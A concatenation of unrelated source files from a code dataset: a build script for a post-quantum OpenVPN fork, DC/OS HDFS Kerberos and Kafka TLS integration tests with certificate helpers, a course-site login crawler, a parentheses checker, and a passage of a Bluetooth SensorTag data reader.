os.makedirs(name)
except OSError:
pass
# Build oqs_openssl
def build_oqs_openssl():
os.chdir(SCRIPTDIR)
if platform.system() == 'Windows':
PFX86 = os.getenv('ProgramFiles(x86)', '"C:\\Program Files (x86)"')
VSWHERE = PFX86 + '\\Microsoft Visual Studio\\Installer\\vswhere.exe'
if not os.path.exists(VSWHERE):
raise RuntimeError('Cannot locate vswhere.exe. Please make sure Visual Studio 2017 or higher is installed.')
# .rstrip() removes the trailing newline that vswhere outputs
VSINSTALLPATH = subprocess.check_output([VSWHERE, '-latest', '-property', 'installationPath']).rstrip()
VCVARSALL = '"' + VSINSTALLPATH + '\\VC\\Auxiliary\\Build\\vcvarsall.bat"'
# Duplicate the source trees for X64 and X86 builds. Delete old copies if they
# exist. Development should always happen in openssl-oqs.
if (os.path.exists('scratch\\openssl-oqs-win-x64')):
shutil.rmtree('scratch\\openssl-oqs-win-x64')
if (os.path.exists('scratch\\openssl-oqs-win-x86')):
shutil.rmtree('scratch\\openssl-oqs-win-x86')
shutil.copytree('repos\\openssl-oqs', 'scratch\\openssl-oqs-win-x64')
shutil.copytree('repos\\openssl-oqs', 'scratch\\openssl-oqs-win-x86')
os.chdir('scratch\\openssl-oqs-win-x86')
# Start the X86 build
run_command(['perl', 'Configure', 'VC-WIN32', 'no-asm', 'enable-static-engine'])
run_command(['ms\\do_ms.bat'])
# vcvarsall may change the current working directory. Remember where we were and cd back to it.
mycwd = os.getcwd()
os.system(VCVARSALL + ' x86 && cd /d ' + mycwd + ' && nmake -f ms\\ntdll.mak')
# Copy the binaries to ../oqs-openssl-win
shutil.copy('out32dll\\libeay32.dll', '..\\..\\oqs-openssl-win\\x86\\')
shutil.copy('out32dll\\ssleay32.dll', '..\\..\\oqs-openssl-win\\x86\\')
# TODO: is there a way to check that the other DLLs in
# oqs-openssl-win\x86 (e.g., vcruntime140.dll) have the right version to
# work with these openssl DLLs? somehow check that the dependencies of
# libeay32.dll and ssleay32.dll are present in the x86 folder.
# Start the x64 build
os.chdir('..\\openssl-oqs-win-x64')
run_command(['perl', 'Configure', 'VC-WIN64A', 'no-asm', 'enable-static-engine'])
run_command(['ms\\do_win64a.bat'])
# Before running nmake, we have to run vcvarsall.bat to set the x64 env vars, in the same shell
mycwd = os.getcwd()
os.system(VCVARSALL + ' amd64 && cd /d ' + mycwd + ' && nmake -f ms\\ntdll.mak')
# Copy the binaries to ../oqs-openssl-win
shutil.copy('out32dll\\libeay32.dll', '..\\..\\oqs-openssl-win\\x64\\')
shutil.copy('out32dll\\ssleay32.dll', '..\\..\\oqs-openssl-win\\x64\\')
os.chdir('..\\..')
if platform.system() == 'Linux':
makedirs('scratch/oqs-openssl-output/openssl')
makedirs('scratch/oqs-openssl-output/ssl')
prefix = os.path.abspath('scratch/oqs-openssl-output/openssl')
openssldir = os.path.abspath('scratch/oqs-openssl-output/ssl')
os.chdir('repos/openssl-oqs')
run_command(['./config', 'shared', '--prefix='+prefix, '--openssldir='+openssldir])
run_command(['make'])
# At the point we snapped to in OQS-OpenSSL, some tests were broken unrelated
# to us, and not in a way that seems to matter. Skip running tests, now that
# run_command will raise an exception when the command fails.
# run_command(['make', 'test'])
run_command(['make', 'install'])
os.chdir('../..')
def on_error(func, path, exc_info):
"""
Error handler for ``shutil.rmtree``.
If the error is due to an access error (read only file)
it attempts to add write permission and then retries.
If the error is for another reason it re-raises the error.
Usage : ``shutil.rmtree(path, onerror=onerror)``
"""
import stat
if not os.access(path, os.W_OK):
# Is the error an access error ?
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise
def build_openvpn_linux():
os.chdir(SCRIPTDIR)
if os.path.exists('stage'):
shutil.rmtree('stage')
makedirs('stage')
stagepath = os.path.abspath('stage')
os.chdir(os.path.join('repos', OPENVPN_REPO_DIRNAME))
run_command(['autoreconf', '-i', '-f', '-v'])
if not os.path.exists("../../scratch/oqs-openssl-output/"):
print "Didn't find oqs-openssl-output directory, exiting"
sys.exit(1)
lib_path = os.path.abspath('../../scratch/oqs-openssl-output/openssl/lib')
inc_path = os.path.abspath('../../scratch/oqs-openssl-output/openssl/include')
openssl_cflags = 'OPENSSL_CFLAGS="-I' + inc_path + '"'
openssl_libs = 'OPENSSL_LIBS="-L' + lib_path + ' -Wl,-rpath='+ OPENVPN_LINUX_PREFIX + '/lib ' + ' -lssl -lcrypto"'
# we need to use os.system here so that the env vars are set correctly
os.system('./configure --prefix=' + OPENVPN_LINUX_PREFIX + ' ' + openssl_cflags + ' ' + openssl_libs + ' && make && make DESTDIR=' + stagepath + ' install')
# We need to copy our versions of libcrypto and libssl into the staging area
makedirs(stagepath + '/' + OPENVPN_LINUX_PREFIX + '/lib')
shutil.copy(lib_path + '/libcrypto.so.1.0.0', stagepath + '/' + OPENVPN_LINUX_PREFIX + '/lib')
shutil.copy(lib_path + '/libssl.so.1.0.0', stagepath + '/' + OPENVPN_LINUX_PREFIX + '/lib')
os.chdir('../..')
# Create a tarball for linux (needed to do Raspberry Pi builds)
# Temporarily disabled
# makedirs('pq-openvpn-linux')
# shutil.move('oqs-openssl-output', 'pq-openvpn-linux')
# shutil.move('openvpn-pq', 'pq-openvpn-linux')
# os.chdir('repos')
# run_command(['tar', 'czf', 'pq-openvpn-linux.tgz', 'oqs-openssl-output', OPENVPN_REPO_DIRNAME])
# os.chdir('..')
# shutil.move('pq-openvpn-linux.tgz', '../pq-openvpn-linux.tgz')
## Create a staged tarball for Linux
os.chdir('stage')
# Create placeholders for etc and log directories so they'll be created
makedirs('.' + OPENVPN_LINUX_PREFIX + '/etc')
makedirs('.' + OPENVPN_LINUX_PREFIX + '/log')
makedirs('.' + OPENVPN_LINUX_PREFIX + '/sbin')
makedirs('.' + OPENVPN_LINUX_PREFIX + '/share/doc/openvpn')
run_command(['touch', '.' + OPENVPN_LINUX_PREFIX + '/etc/.placeholder', '.' + OPENVPN_LINUX_PREFIX + '/log/.placeholder'])
# Copy initial setup script into sbin directory
shutil.copy('../initialsetup.sh', '.' + OPENVPN_LINUX_PREFIX + '/sbin')
# Copy pointer to privacy statement into doc directory
shutil.copy('../PRIVACY.txt', '.' + OPENVPN_LINUX_PREFIX + '/share/doc/openvpn')
# Copy Third Party notice into doc directory
shutil.copy('../../../ThirdPartyNotice.txt', '.' + OPENVPN_LINUX_PREFIX + '/share/doc/openvpn')
# Copy service file for systemd into the appropriate place
makedirs('etc/systemd/system')
shutil.copy('../pq-openvpn.service', 'etc/systemd/system')
# Create staged tarball
run_command(['tar', '-cz', '--group=root', '--owner=root', '-f', '../pq-openvpn-linux-staged.tar.gz', '.'])
os.chdir('..')
def build_openvpn_windows():
# Only build the Windows version if we have Windows OQS-OpenSSL binaries
os.chdir(SCRIPTDIR)
for filename in ['libeay32.dll', 'ssleay32.dll']:
for platform in ['x86', 'x64']:
fullpath = 'oqs-openssl-win/' + platform + '/' + filename
if not os.path.exists(fullpath):
print 'Skipping Windows build because ' + fullpath + ' does not exist.'
print 'To build the Windows installer, you need to build the OQS-OpenSSL fork on Windows'
print 'with this script and copy the oqs-openssl-win tree into your Linux build host.'
return
os.chdir(os.path.join('repos', OPENVPN_REPO_DIRNAME))
run_command(['autoreconf', '-i', '-v', '-f'])
run_command(['./configure'])
os.chdir('../..')
# the OpenVPN build scripts need a tarball of the same code
if os.path.exists(OPENVPN_TGZ_NAME):
os.remove(OPENVPN_TGZ_NAME)
os.chdir('repos')
run_command(['tar', 'czvvf', OPENVPN_TGZ_NAME, OPENVPN_REPO_DIRNAME])
os.chdir('..')
os.chdir(os.path.join('repos', OPENVPN_GUI_REPO_DIRNAME))
run_command(['autoreconf', '-i', '-v', '-f'])
os.chdir('../..')
if os.path.exists(OPENVPN_GUI_TGZ_NAME):
os.remove(OPENVPN_GUI_TGZ_NAME)
os.chdir('repos')
run_command(['tar', 'czvvf', OPENVPN_GUI_TGZ_NAME, OPENVPN_GUI_REPO_DIRNAME])
os.chdir('..')
# Start the build
os.chdir('repos/openvpn-build')
run_command(['./windows-nsis/build-complete'])
shutil.move("windows-nsis/" + OPENVPN_INSTALL_EXE_NAME, "../../" + OPENVPN_INSTALL_EXE_NAME)
os.chdir('../..')
######## main ##########
# Make sure the submodules have been cloned.
for reponame in ['openssl-oqs', OPENVPN_REPO_DIRNAME, 'openvpn-build', OPENVPN_GUI_REPO_DIRNAME]:
if not os.path.exists(os.path.join('repos', reponame)):
raise RuntimeError('Could not find submodule ' + reponame + '. Please use --recurse-submodules option when cloning, or use \'git submodule init\' and \'git submodule update\'.')
# (Re)create the scratch dir, switch to it
os.chdir(SCRIPTDIR)
scratch_dir = "scratch"
if os.path.exists(scratch_dir):
shutil.rmtree(scratch_dir, False, on_error)
build_oqs_openssl()
# If this is Windows, we're done
if platform.system() == 'Windows':
print "Operating system detected as Windows, building OQS-OpenSSL only"
print "The binaries in Walrus/openvpn/build/oqs-openssl-win should now be updated"
sys.exit(0)
build_openvpn_linux()
build_openvpn_windows()
print "The staged tarball provides a readily deployable set of binaries on a Linux VM to quickly"
print "bring up a VPN server. It has been tested with the Ubuntu image currently provided by Azure."
print "This installation may be usable as a client with a client configuration file instead, but this"
print "is untested, and the automatic service startup is configured to look for server.ovpn as a config file."
print "To use the staged Linux tarball, do the following as root/using sudo in your VM:"
print "1. cd /"
print "2. tar xvzf <path>/pq-openvpn-linux-staged.tar.gz"
print "3. Create /usr/local/openvpn/etc/server.ovpn and dependent cert/key files as"
print " needed."
print "4. /usr/local/openvpn/sbin/initialsetup.sh"
print ""
print "To upgrade an existing installation:"
print "1. systemctl stop pq-openvpn"
print "2. cd /"
print "3. tar xvzf <path>/pq-openvpn-linux-staged.tar.gz"
print "4. systemctl start pq-openvpn"
``` |
{
"source": "jitul9680/DS-Algo-Point",
"score": 3
} |
#### File: DS-Algo-Point/Python/balanced_parenthes_without_stack.py
```python
def isBalanced(s):
restart=True
while restart:
if '{}' in s:
s=s.replace('{}','')
elif '()' in s:
s=s.replace('()','')
elif '[]' in s:
s=s.replace('[]','')
else:
restart=False
return 'YES' if len(s)==0 else 'NO'
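# More illustrative cases: isBalanced("{[()]}") returns 'YES', isBalanced("{[(])}") returns 'NO'.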
x=isBalanced("[{}")
print(x)
``` |
{
"source": "jitupawar22/dcos-commons",
"score": 2
} |
#### File: hdfs/tests/test_kerberos_auth.py
```python
import logging
import pytest
import sdk_auth
import sdk_cmd
import sdk_install
import sdk_marathon
import sdk_utils
from tests import auth
from tests import config
log = logging.getLogger(__name__)
pytestmark = pytest.mark.skipif(sdk_utils.is_open_dcos(),
reason='Feature only supported in DC/OS EE')
@pytest.fixture(scope='module', autouse=True)
def kerberos(configure_security):
try:
kerberos_env = sdk_auth.KerberosEnvironment()
principals = auth.get_service_principals(config.FOLDERED_SERVICE_NAME,
kerberos_env.get_realm())
kerberos_env.add_principals(principals)
kerberos_env.finalize()
service_kerberos_options = {
"service": {
"name": config.FOLDERED_SERVICE_NAME,
"security": {
"kerberos": {
"enabled": True,
"kdc": {
"hostname": kerberos_env.get_host(),
"port": int(kerberos_env.get_port())
},
"keytab_secret": kerberos_env.get_keytab_path(),
"realm": kerberos_env.get_realm()
}
}
},
"hdfs": {
"security_auth_to_local": auth.get_principal_to_user_mapping()
}
}
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
sdk_install.install(
config.PACKAGE_NAME,
config.FOLDERED_SERVICE_NAME,
config.DEFAULT_TASK_COUNT,
additional_options=service_kerberos_options,
timeout_seconds=30*60)
yield kerberos_env
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.FOLDERED_SERVICE_NAME)
if kerberos_env:
kerberos_env.cleanup()
@pytest.fixture(autouse=True)
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
@pytest.mark.smoke
@pytest.mark.sanity
@pytest.mark.skip(reason="HDFS-493")
def test_health_of_kerberized_hdfs():
config.check_healthy(service_name=config.FOLDERED_SERVICE_NAME)
@pytest.fixture(scope="module", autouse=True)
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
def kerberized_hdfs_client(kerberos):
try:
client_app_def = config.get_kerberized_hdfs_client_app()
client_app_def["secrets"]["hdfs_keytab"]["source"] = kerberos.get_keytab_path()
client_app_def["env"]["REALM"] = kerberos.get_realm()
client_app_def["env"]["KDC_ADDRESS"] = kerberos.get_kdc_address()
client_app_def["env"]["HDFS_SERVICE_NAME"] = config.FOLDERED_DNS_NAME
sdk_marathon.install_app(client_app_def)
yield client_app_def["id"]
finally:
sdk_marathon.destroy_app(client_app_def["id"])
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
@pytest.mark.auth
@pytest.mark.sanity
@pytest.mark.skip(reason="HDFS-493")
def test_user_can_auth_and_write_and_read(kerberized_hdfs_client):
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("hdfs"))
test_filename = "test_auth_write_read" # must be unique among tests in this suite
write_cmd = "/bin/bash -c '{}'".format(config.hdfs_write_command(config.TEST_CONTENT_SMALL, test_filename))
sdk_cmd.task_exec(kerberized_hdfs_client, write_cmd)
read_cmd = "/bin/bash -c '{}'".format(config.hdfs_read_command(test_filename))
_, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, read_cmd)
assert stdout == config.TEST_CONTENT_SMALL
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
@pytest.mark.auth
@pytest.mark.sanity
@pytest.mark.skip(reason="HDFS-493")
def test_users_have_appropriate_permissions(kerberized_hdfs_client):
# "hdfs" is a superuser
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("hdfs"))
log.info("Creating directory for alice")
make_user_directory_cmd = config.hdfs_command("mkdir -p /users/alice")
sdk_cmd.task_exec(kerberized_hdfs_client, make_user_directory_cmd)
change_ownership_cmd = config.hdfs_command("chown alice:users /users/alice")
sdk_cmd.task_exec(kerberized_hdfs_client, change_ownership_cmd)
change_permissions_cmd = config.hdfs_command("chmod 700 /users/alice")
sdk_cmd.task_exec(kerberized_hdfs_client, change_permissions_cmd)
test_filename = "test_user_permissions" # must be unique among tests in this suite
# alice has read/write access to her directory
sdk_auth.kdestroy(kerberized_hdfs_client)
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("alice"))
write_access_cmd = "/bin/bash -c \"{}\"".format(config.hdfs_write_command(
config.TEST_CONTENT_SMALL,
"/users/alice/{}".format(test_filename)))
log.info("Alice can write: {}".format(write_access_cmd))
rc, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, write_access_cmd)
assert stdout == '' and rc == 0
read_access_cmd = config.hdfs_read_command("/users/alice/{}".format(test_filename))
log.info("Alice can read: {}".format(read_access_cmd))
_, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, read_access_cmd)
assert stdout == config.TEST_CONTENT_SMALL
ls_cmd = config.hdfs_command("ls /users/alice")
_, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, ls_cmd)
assert "/users/alice/{}".format(test_filename) in stdout
# bob doesn't have read/write access to alice's directory
sdk_auth.kdestroy(kerberized_hdfs_client)
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("bob"))
log.info("Bob tries to write to alice's directory: {}".format(write_access_cmd))
_, _, stderr = sdk_cmd.task_exec(kerberized_hdfs_client, write_access_cmd)
log.info("Bob can't write to alice's directory: {}".format(write_access_cmd))
assert "put: Permission denied: user=bob" in stderr
log.info("Bob tries to read from alice's directory: {}".format(read_access_cmd))
_, _, stderr = sdk_cmd.task_exec(kerberized_hdfs_client, read_access_cmd)
log.info("Bob can't read from alice's directory: {}".format(read_access_cmd))
assert "cat: Permission denied: user=bob" in stderr
```
#### File: kafka/tests/test_tls.py
```python
import pytest
import shakedown
import sdk_cmd
import sdk_install
import sdk_networks
import sdk_plan
import sdk_security
import sdk_utils
from tests import config
# Name of the broker TLS vip
BROKER_TLS_ENDPOINT = 'broker-tls'
@pytest.fixture(scope='module')
def service_account(configure_security):
"""
Creates service account and yields the name.
"""
try:
name = config.SERVICE_NAME
sdk_security.create_service_account(
service_account_name=name, service_account_secret=name)
# TODO(mh): Fine grained permissions needs to be addressed in DCOS-16475
sdk_cmd.run_cli(
"security org groups add_user superusers {name}".format(name=name))
yield name
finally:
sdk_security.delete_service_account(
service_account_name=name, service_account_secret=name)
@pytest.fixture(scope='module')
def kafka_service_tls(service_account):
try:
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
config.install(
config.PACKAGE_NAME,
config.SERVICE_NAME,
config.DEFAULT_BROKER_COUNT,
additional_options={
"service": {
"service_account": service_account,
"service_account_secret": service_account,
"security": {
"transport_encryption": {
"enabled": True
}
}
}
}
)
sdk_plan.wait_for_completed_deployment(config.SERVICE_NAME)
yield service_account
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
@pytest.mark.tls
@pytest.mark.smoke
@pytest.mark.sanity
@sdk_utils.dcos_ee_only
@pytest.mark.dcos_min_version('1.10')
def test_tls_endpoints(kafka_service_tls):
endpoints = sdk_networks.get_and_test_endpoints(config.PACKAGE_NAME, config.SERVICE_NAME, "", 2)
assert BROKER_TLS_ENDPOINT in endpoints
# Test that broker-tls endpoint is available
endpoint_tls = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'endpoints {name}'.format(name=BROKER_TLS_ENDPOINT), json=True)
assert len(endpoint_tls['dns']) == config.DEFAULT_BROKER_COUNT
@pytest.mark.tls
@pytest.mark.smoke
@pytest.mark.sanity
@sdk_utils.dcos_ee_only
@pytest.mark.dcos_min_version('1.10')
def test_producer_over_tls(kafka_service_tls):
sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic create {}'.format(config.DEFAULT_TOPIC_NAME))
topic_info = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic describe {}'.format(config.DEFAULT_TOPIC_NAME), json=True)
assert len(topic_info['partitions']) == config.DEFAULT_PARTITION_COUNT
# Write twice: Warm up TLS connections
num_messages = 10
write_info = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic producer_test_tls {} {}'.format(config.DEFAULT_TOPIC_NAME, num_messages), json=True)
write_info = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic producer_test_tls {} {}'.format(config.DEFAULT_TOPIC_NAME, num_messages), json=True)
assert len(write_info) == 1
assert write_info['message'].startswith('Output: {} records sent'.format(num_messages))
```
#### File: testing/security/transport_encryption.py
```python
import json
import logging
import sdk_cmd
log = logging.getLogger(__name__)
def fetch_dcos_ca_bundle(task: str) -> str:
"""Fetch the DC/OS CA bundle from the leading Mesos master"""
local_bundle_file = "dcos-ca.crt"
cmd = ["curl", "-L", "--insecure", "-v",
"leader.mesos/ca/dcos-ca.crt",
"-o", local_bundle_file]
sdk_cmd.task_exec(task, " ".join(cmd))
return local_bundle_file
def create_tls_artifacts(cn: str, task: str) -> str:
pub_path = "{}_pub.crt".format(cn)
priv_path = "{}_priv.key".format(cn)
log.info("Generating certificate. cn={}, task={}".format(cn, task))
output = sdk_cmd.task_exec(
task,
'openssl req -nodes -newkey rsa:2048 -keyout {} -out request.csr '
'-subj "/C=US/ST=CA/L=SF/O=Mesosphere/OU=Mesosphere/CN={}"'.format(priv_path, cn))
log.info(output)
assert output[0] == 0
rc, raw_csr, _ = sdk_cmd.task_exec(task, 'cat request.csr')
assert rc == 0
request = {
"certificate_request": raw_csr
}
token = sdk_cmd.run_cli("config show core.dcos_acs_token")
output = sdk_cmd.task_exec(
task,
"curl --insecure -L -X POST "
"-H 'Authorization: token={}' "
"leader.mesos/ca/api/v2/sign "
"-d '{}'".format(token, json.dumps(request)))
log.info(output)
assert output[0] == 0
# Write the public cert to the client
certificate = json.loads(output[1])["result"]["certificate"]
output = sdk_cmd.task_exec(task, "bash -c \"echo '{}' > {}\"".format(certificate, pub_path))
log.info(output)
assert output[0] == 0
create_keystore_truststore(cn, task)
return "CN={},OU=Mesosphere,O=Mesosphere,L=SF,ST=CA,C=US".format(cn)
def create_keystore_truststore(cn: str, task: str):
pub_path = "{}_pub.crt".format(cn)
priv_path = "{}_priv.key".format(cn)
keystore_path = "{}_keystore.jks".format(cn)
truststore_path = "{}_truststore.jks".format(cn)
log.info("Generating keystore and truststore, task:{}".format(task))
dcos_ca_bundle = fetch_dcos_ca_bundle(task)
# Convert to a PKCS12 key
output = sdk_cmd.task_exec(
task,
'bash -c "export RANDFILE=/mnt/mesos/sandbox/.rnd && '
'openssl pkcs12 -export -in {} -inkey {} '
'-out keypair.p12 -name keypair -passout pass:export '
'-CAfile {} -caname root"'.format(pub_path, priv_path, dcos_ca_bundle))
log.info(output)
assert output[0] == 0
log.info("Generating certificate: importing into keystore and truststore")
# Import into the keystore and truststore
output = sdk_cmd.task_exec(
task,
"keytool -importkeystore "
"-deststorepass changeit -destkeypass changeit -destkeystore {} "
"-srckeystore keypair.p12 -srcstoretype PKCS12 -srcstorepass export "
"-alias keypair".format(keystore_path))
log.info(output)
assert output[0] == 0
output = sdk_cmd.task_exec(
task,
"keytool -import -trustcacerts -noprompt "
"-file {} -storepass changeit "
"-keystore {}".format(dcos_ca_bundle, truststore_path))
log.info(output)
assert output[0] == 0
``` |
{
"source": "jitwei98/expiry-tracker-bot",
"score": 2
} |
#### File: management/commands/notify_users.py
```python
from datetime import date, timedelta
from django.core.management import BaseCommand
from upload.models import Food
class Command(BaseCommand):
def add_arguments(self, parser):
pass
# parser.add_argument('poll_ids', nargs='+', type=int)
#
# # Named (optional) arguments
# parser.add_argument(
# '--delete',
# action='store_true',
# help='Delete poll instead of closing it',
# )
def handle(self, *args, **options):
date_threshold = date.today() + timedelta(days=3)
food_qs = Food.objects.filter(expiry_date__lt=date_threshold)
output = food_qs.values_list('name', 'expiry_date')
self.stdout.write(str(output))
``` |
{
"source": "jitwxs/JITZhuoYueCourseCrawler",
"score": 3
} |
#### File: jitwxs/JITZhuoYueCourseCrawler/Login.py
```python
import requests,re,getpass
import http.cookiejar as cookielib
from bs4 import BeautifulSoup
agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'
headers = {'User-Agent':agent}
loginUrl = 'http://192.168.127.12/moodle/login/index.php'
# Get the session object
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='cookies')
# Read the cookie file
try:
session.cookies.load(ignore_discard=True)
print('Cookie加载成功')
except:
print('Cookie未能加载')
# Login class
class Login:
def __init__(self):
pass
def getHTMLText(self,url):
try:
r = session.get(url,timeout=30,headers=headers)
r.raise_for_status()
r.encoding = r.apparent_encoding
return r.text
except:
return None
def getSoupObj(self,url):
try:
html = self.getHTMLText(url)
soup = BeautifulSoup(html,'html.parser')
return soup
except:
print('\nError: failed to get the Soup object')
return None
# Check whether we are logged in
def checkLogin(self):
soup = self.getSoupObj(loginUrl)
loginInfo = soup('div',{'class':'logininfo'})
try:
info = loginInfo[0].text
print(info)
if info == '您尚未登录。':
return False
else:
return True
except:
print('获取登录信息发生错误')
return False
def getSession(self):
return session
def login(self):
username = input('请输入登陆名: ')
password = <PASSWORD>('请输入密码: ')
# If getpass above is not supported, use the statement below instead
## password = input('请输入密码: ')
post_data = {'username':username,
'password':password
}
post_url = loginUrl
try:
login_page = session.post(post_url,headers = headers,data = post_data)
# Save the cookie
session.cookies.save()
except:
print('登陆出现异常!')
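# Typical usage (illustrative): create a Login instance, call login() if checkLogin() returns
# False, then reuse getSession() for authenticated requests to the course site.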
``` |
{
"source": "jitx/anrg-sensortag-weather-probe",
"score": 2
} |
#### File: jitx/anrg-sensortag-weather-probe/sensor.py
```python
import pexpect
import time
from datetime import datetime
uuid_pre = "F000"
uuid_pos = "-0451-4000-B000-000000000000"
#format: handle = [data, config]
temp_uuid = ["AA01", "AA02"]
move_uuid = ["AA81", "AA82"]
humd_uuid = ["AA21", "AA22"]
baro_uuid = ["AA41", "AA42"]
opti_uuid = ["AA71", "AA72"]
leds_uuid = ["AA65", "AA66"]
sensor_mac = "B0:B4:48:C0:CA:03"
prompt = "\[CON\]\[" + sensor_mac + "\]\[LE\]>"
stealth_mode = False
active_sensors = [temp_uuid, move_uuid, humd_uuid, baro_uuid, opti_uuid]
sensor_uuid_to_cvh = {}
def log(data):
f = open("log.txt", "a")
f.write(data + "\n")
print data
f.close()
def turn_sensor_on(cnfg, hnd):
child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
child.expect(prompt)
def turn_sensor_off(cnfg, hnd):
child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
child.expect(prompt)
def read_sensor_data(data):
child.sendline("char-read-hnd " + sensor_uuid_to_cvh[uuid_pre + data + uuid_pos])
child.expect(prompt)
child.before
child.expect(prompt)
data = child.before
return data.strip().split(": ")[1]
def print_temp_data(value):
SCALE_LSB = 0.03125
value = value.split(" ")
obj_temp = "0x" + value[1] + value[0]
amb_temp = "0x" + value[3] + value[2]
obj_temp_cel = (float)(int(obj_temp, 16) >> 2) * SCALE_LSB
amb_temp_cel = (float)(int(amb_temp, 16) >> 2) * SCALE_LSB
obj_temp_fah = obj_temp_cel * (9.0/5.0) + 32.0
amb_temp_fah = amb_temp_cel * (9.0/5.0) + 32.0
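# Worked example (illustrative): raw bytes "0c 0b" reassemble little-endian to 0x0b0c = 2828;
# 2828 >> 2 = 707 and 707 * 0.03125 ≈ 22.1 °C (≈ 71.8 °F).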
log("IR TEMPERATURE")
log("\tOBJECT\t\t: " + str(obj_temp_cel) + "°C" + " | " + str(obj_temp_fah) + "°F")
log("\tAMBIENT\t\t: " + str(amb_temp_cel) + "°C" + " | " + str(amb_temp_fah) + "°F")
def print_move_data(value):
value = value.split(" ")
gyro_x = "0x" + value[1] + value[0]
gyro_y = "0x" + value[3] + value[2]
gyro_z = "0x" + value[5] + value[4]
acc_x = "0x" + value[7] + value[6]
acc_y = "0x" + value[9] + value[8]
acc_z = "0x" + value[11] + value[10]
mag_x = "0x" + value[13] + value[12]
mag_y = "0x" + value[15] + value[14]
mag_z = "0x" + value[17] + value[16]
gyro_x_dps = (((float)(int(gyro_x, 16))) * 1.0) / (65536.0 / 500.0)
gyro_y_dps = (((float)(int(gyro_y, 16))) * 1.0) / (65536.0 / 500.0)
gyro_z_dps = (((float)(int(gyro_z, 16))) * 1.0) / (65536.0 / 500.0)
acc_range = 16.0 # turning on handle to 0xffff sets to 16
acc_x_mps = (((float)(int(acc_x, 16))) * 1.0) / (32768.0 / acc_range)
acc_y_mps = (((float)(int(acc_y, 16))) * 1.0) / (32768.0 / acc_range)
acc_z_mps = (((float)(int(acc_z, 16))) * 1.0) / (32768.0 / acc_range)
mag_x_ut = ((float)(int(mag_x, 16))) * 1.0
mag_y_ut = ((float)(int(mag_y, 16))) * 1.0
mag_z_ut = ((float)(int(mag_z, 16))) * 1.0
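# Worked example (illustrative, ignoring sign handling as above): raw gyro bytes "00 20" -> 0x2000 = 8192,
# 8192 / (65536 / 500) = 62.5 °/s; raw accel bytes "00 08" -> 0x0800 = 2048, 2048 / (32768 / 16) = 1.0.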
log("MOVEMENT")
log("\tGYROSCOPE\t: " + "X: " + str(gyro_x_dps) + "°/s" + " | " + "Y: " + str(gyro_y_dps) + "°/s" + " | " + "Z: " + str(gyro_z_dps) + "°/s")
log("\tACCELEROMETER\t: " + "X: " + str(acc_x_mps) + "m/s" + " | " + "Y: " + str(acc_y_mps) + "m/s" + " | " + "Z: " + str(acc_z_mps) + "m/s")
log("\tMAGNETOMETER\t: " + "X: " + str(mag_x_ut) + "µT" + " | " + "Y: " + str(mag_y_ut) + "µT" + " | " + "Z: " + str(mag_z_ut) + "µT")
def print_humd_data(value):
value = value.split(" ")
temp = "0x" + value[1] + value[0]
humd = "0x" + value[3] + value[2]
temp_cel = ((float)(int(temp, 16))) / 65536.0 * 165.0 - 40.0
temp_fah = temp_cel * (9.0/5.0) + 32.0
humd_rel = (float)(int(humd, 16) & ~0x0003) / 65536.0 * 100.0
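# Worked example (illustrative): raw temperature bytes "66 66" -> 0x6666 = 26214 -> 26214/65536*165-40 ≈ 26.0 °C;
# raw humidity bytes "00 60" -> 0x6000 = 24576 -> 24576/65536*100 = 37.5 %.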
log("HUMIDITY")
log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
log("\tHUMDITY\t\t: " + str(humd_rel) + "%")
def print_baro_data(value):
value = value.split(" ")
temp = "0x" + value[2] + value[1] + value[0]
baro = "0x" + value[5] + value[4] + value[3]
temp_cel = ((float)(int(temp, 16))) / 100.0
temp_fah = temp_cel * (9.0/5.0) + 32.0
baro_hpa = ((float)(int(baro, 16))) / 100.0
baro_kpa = baro_hpa / 10.0
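# Worked example (illustrative): raw pressure bytes "9e 8a 01" -> 0x018a9e = 101022 ->
# 1010.22 hPa = 101.022 kPa, roughly standard sea-level pressure.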
log("BAROMETER")
log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
log("\tPRESSURE\t: " + str(baro_kpa) + "kPa" + " | " + str(baro_hpa) + "hPa")
def print_opti_data(value):
value = value.split(" ")
opti = "0x" + value[1] + value[0]
m = int(opti, 16) & 0x0FFF
e = (int(opti, 16) & 0xF000) >> 12
if (e == 0):
e = 1
else:
e = 2 << (e - 1)
opti_lux = m * (0.01 * e)
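# Worked example (illustrative): raw bytes "9a 34" -> 0x349a; mantissa 0x49a = 1178, exponent 3
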